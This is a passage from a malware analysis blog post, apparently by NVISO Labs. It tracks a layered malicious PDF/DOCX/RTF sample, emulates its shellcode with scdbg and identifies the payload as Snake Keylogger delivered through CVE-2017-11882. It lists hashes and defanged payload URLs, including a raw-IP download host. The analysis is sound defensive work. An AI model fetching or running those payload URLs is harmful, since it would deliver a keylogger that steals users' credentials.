Figure 40: Analysis of the extracted ole file

It succeeds: it contains one stream.
Let’s select it for further analysis:

Figure 41: Content of the stream

This binary data looks random.
Let’s use option -S to extract strings (this option is like the strings command) from this binary data:

Figure 42: Extracting strings

There’s nothing recognizable here.

Let’s summarize where we are: we extracted an ole file from an RTF file that was downloaded by a .docx file embedded in a PDF file. When we say it like this, we can only think that this is malicious.

Shellcode analysis

Remember that malicious RTF files very often contain exploits? Exploits often use shellcode. Let’s see if we can find shellcode.
To achieve this, we are going to use scdbg, a shellcode emulator developed by David Zimmer.
First we are going to write the content of the stream to a file:

Figure 43: Writing the (potential) shellcode to disk

scdbg is an free, open source tool that emulates 32-bit shellcode designed to run on the Windows operating system. Started as a project running on Windows and Linux, it is now further developed for Windows only.

Figure 44: Scdbg

We download Windows binaries for scdbg:

Figure 45: Scdbg binary files

And extract executable scdbg.exe to our working directory:

Figure 46: Extracting scdbg.exe
Figure 47: Extracting scdbg.exe

Although scdbg.exe is a Windows executable, we can run it on Ubuntu via Wine:

Figure 48: Trying to use wine

Wine is not installed, but by now, we know how to install tools like this:

Figure 49: Installing wine
Figure 50: Tasting wine 😊

We can now run scdbg.exe like this:

wine scdbg.exe

scdbg requires some options: -f sc.vir to provide it with the file to analyze

Shellcode has an entry point: the address from where it starts to execute. By default, scdbg starts to emulate from address 0. Since this is an exploit (we have not yet recognized which exploit, but that does not prevent us from trying to analyze the shellcode), its entry point will not be address 0. At address 0, we should find a data structure (that we have not identified) that is exploited.
To summarize: we don’t know the entry point, but it’s important to know it.
Solution: scdbg.exe has an option to try out all possible entry points. Option -findsc.
And we add one more option to produce a report: -r.

Let’s try this:

Figure 51: Running scdbg via wine

This looks good: after a bunch of messages and warnings from Wine that we can ignore, scdbg proposes us with 8 (0 through 7) possible entry points. We select the first one: 0

Figure 52: Trying entry point 0 (address 0x95)

And we are successful: scdbg.exe was able to emulate the shellcode, and show the different Windows API calls performed by the shellcode. The most important one for us analysts, is URLDownloadToFile. This tells us that the shellcode downloads a file and writes it to disk (name vbc.exe).
Notice that scdbg did emulate the shellcode: it did not actually execute the API calls, no files were downloaded or written to disk.

Although we don’t know which exploit we are dealing with, scdbg was able to find the shellcode and emulate it, providing us with an overview of the actions executed by the shellcode.
The shellcode is obfuscated: that is why we did not see strings like the URL and filename when extracting the strings (see figure 42). But by emulating the shellcode, scdbg also deobfuscates it.

We can now use curl again to try to download the file:

Figure 53: Downloading the executable

And it is indeed a Windows executable (.NET):

Figure 54: Headers
Figure 55: Running command file on the downloaded file

To determine what we are dealing with, we try to look it up on VirusTotal.
First we calculate its hash:

Figure 56: Calculating the MD5 hash

And then we look it up through its hash on VirusTotal:

Figure 57: VirusTotal report

From this report, we conclude that the executable is Snake Keylogger.

If the file would not be present on VirusTotal, we could upload it for analysis, provided we accept the fact that we can potentially alert the criminals that we have discovered their malware.

In the video for this blog post, there’s a small bonus at the end, where we identify the exploit: CVE-2017-11882.

This is a long blog post, not only because of the different layers of malware in this sample. But also because in this blog post, we provide more context and explanations than usual.
We explained how to install the different tools that we used.
We explained why we chose each tool, and why we execute each command.
There are many possible variations of this analysis, and other tools that can be used to achieve similar results. I for example, would pipe more commands together.
The important aspect to static analysis like this one, is to use dedicated tools. Don’t use a PDF reader to open the PDF, don’t use Office to open the Word document, … Because if you do, you might execute the malicious code.
We have seen malicious documents like this before, and written blog post for them like this one. The sample we analyzed here, has more “layers” than these older maldocs, making the analysis more challenging.

In that blog post, we also explain how this kind of malicious document “works”, by also showing the JavaScript and by opening the document inside a sandbox.


Type Value
PDF sha256: 05dc0792a89e18f5485d9127d2063b343cfd2a5d497c9b5df91dc687f9a1341d
RTF sha256: 165305d6744591b745661e93dc9feaea73ee0a8ce4dbe93fde8f76d0fc2f8c3f
EXE sha256: 20a3e59a047b8a05c7fd31b62ee57ed3510787a979a23ce1fde4996514fae803
URL hxxps://vtaurl[.]com/IHytw
URL hxxp://192[.]227[.]196[.]211/FRESH/fresh[.]exe

These files can be found on VirusTotal, MalwareBazaar and Malshare.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.